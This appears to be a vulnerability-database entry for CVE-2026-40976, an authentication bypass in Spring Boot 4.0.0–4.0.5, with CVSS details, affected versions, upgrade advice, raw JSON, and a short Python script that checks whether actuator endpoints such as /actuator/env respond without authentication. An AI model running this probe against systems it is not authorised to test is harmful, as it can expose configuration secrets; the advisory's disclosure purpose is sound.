Security Vulnerability Report
CVE-2026-40976 CVSS 9.1 CRITICAL

CVE-2026-40976

Published: 2026-04-28 00:16:25
Last Modified: 2026-04-30 13:54:13

Description

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the above does not apply, the application is not vulnerable. Affected: Spring Boot 4.0.0–4.0.5; upgrade to 4.0.6 or later per vendor advisory.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE
Spring Boot 4.0.0
Spring Boot 4.0.1
Spring Boot 4.0.2
Spring Boot 4.0.3
Spring Boot 4.0.4
Spring Boot 4.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-40976
# Checks whether actuator endpoints respond without authentication,
# i.e. whether the default web security filter chain is in effect.
target = "http://127.0.0.1:8080"
endpoints = ["/actuator/env", "/actuator/beans", "/manage"]

for endpoint in endpoints:
    url = target + endpoint
    try:
        r = requests.get(url, timeout=5)
        if r.status_code == 200:
            print(f"[+] Potential Vulnerability found at {url}")
            print(f"[+] Content snippet: {r.text[:100]}")
        elif r.status_code == 401 or r.status_code == 403:
            print(f"[-] {url} is protected (Status: {r.status_code})")
        else:
            print(f"[?] {url} returned status {r.status_code}")
    except Exception as e:
        print(f"Error connecting to {url}: {e}")

References

https://spring.io/security/cve-2026-40976 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40976", "sourceIdentifier": "[email protected]", "published": "2026-04-28T00:16:24.803", "lastModified": "2026-04-30T13:54:12.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the above does not apply, the application is not vulnerable.\n\nAffected: Spring Boot 4.0.0–4.0.5; upgrade to 4.0.6 or later per vendor advisory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.6", "matchCriteriaId": "12A166C5-8B55-4BA3-AA8B-6024A257D441"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-40976", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}